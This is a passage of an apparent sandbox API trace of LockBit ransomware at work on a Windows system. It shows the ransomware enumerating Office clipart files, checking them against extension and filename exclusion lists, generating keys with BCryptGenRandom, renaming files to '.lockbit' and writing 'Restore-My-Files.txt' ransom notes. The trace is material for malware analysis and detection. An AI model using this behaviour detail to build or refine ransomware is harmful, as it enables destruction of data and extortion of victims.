Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.509] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1cb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_08.MID", cAlternateFileName="")) returned 1 [0165.509] lstrcmpiW (lpString1=".", lpString2="PARNT_08.MID") returned -1 [0165.509] lstrcmpiW (lpString1="..", lpString2="PARNT_08.MID") returned -1 [0165.509] PathFindExtensionW (pszPath="PARNT_08.MID") returned=".MID" [0165.509] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.509] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.509] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.509] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.509] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.509] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.509] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.509] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.509] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.510] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.510] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.511] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_08.MID") returned 1 [0165.511] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_08.MID") returned -1 [0165.511] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_08.MID") returned -1 [0165.511] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_08.MID") returned -1 [0165.511] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_08.MID") returned -1 [0165.511] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_08.MID") returned 1 [0165.511] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_08.MID") returned -1 [0165.511] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.511] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned=".MID" [0165.511] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.511] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.511] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.511] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.512] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.512] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.512] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.lockbit") returned 72 [0165.512] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.513] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.513] malloc (_Size=0x40068) returned 0x3df0008 [0165.513] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7347) returned 1 [0165.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.515] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.519] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.519] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.521] free (_Block=0x1fa2ed8) [0165.521] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.521] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.521] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.521] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1a6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_09.MID", cAlternateFileName="")) returned 1 [0165.521] lstrcmpiW (lpString1=".", lpString2="PARNT_09.MID") returned -1 [0165.521] lstrcmpiW (lpString1="..", lpString2="PARNT_09.MID") returned -1 [0165.521] PathFindExtensionW (pszPath="PARNT_09.MID") returned=".MID" [0165.521] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.521] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.521] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.521] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.522] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.522] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.523] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.523] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_09.MID") returned 1 [0165.523] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_09.MID") returned -1 [0165.524] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_09.MID") returned -1 [0165.524] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_09.MID") returned -1 [0165.524] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_09.MID") returned -1 [0165.524] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_09.MID") returned 1 [0165.524] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_09.MID") returned -1 [0165.524] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.524] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned=".MID" [0165.524] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.524] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.524] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.524] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.524] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.524] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.524] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.525] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.525] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.525] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.526] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.526] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.526] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.526] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.526] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.526] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.lockbit") returned 72 [0165.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.527] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.527] malloc (_Size=0x40068) returned 0x3df0008 [0165.527] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6764) returned 1 [0165.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.528] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.528] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.529] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.529] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.540] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.540] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.540] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.541] free (_Block=0x1fa2ed8) [0165.541] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.541] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.541] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.542] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1511, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_10.MID", cAlternateFileName="")) returned 1 [0165.542] lstrcmpiW (lpString1=".", lpString2="PARNT_10.MID") returned -1 [0165.542] lstrcmpiW (lpString1="..", lpString2="PARNT_10.MID") returned -1 [0165.542] PathFindExtensionW (pszPath="PARNT_10.MID") returned=".MID" [0165.542] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.542] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.542] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.542] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.542] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.542] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.542] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.542] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.542] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.542] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.543] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.543] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_10.MID") returned 1 [0165.543] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_10.MID") returned -1 [0165.544] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_10.MID") returned -1 [0165.544] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_10.MID") returned -1 [0165.544] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_10.MID") returned -1 [0165.544] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_10.MID") returned 1 [0165.544] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_10.MID") returned -1 [0165.544] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.544] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_10.MID") returned=".MID" [0165.544] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.544] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.544] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.544] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.544] lstrcmpiW 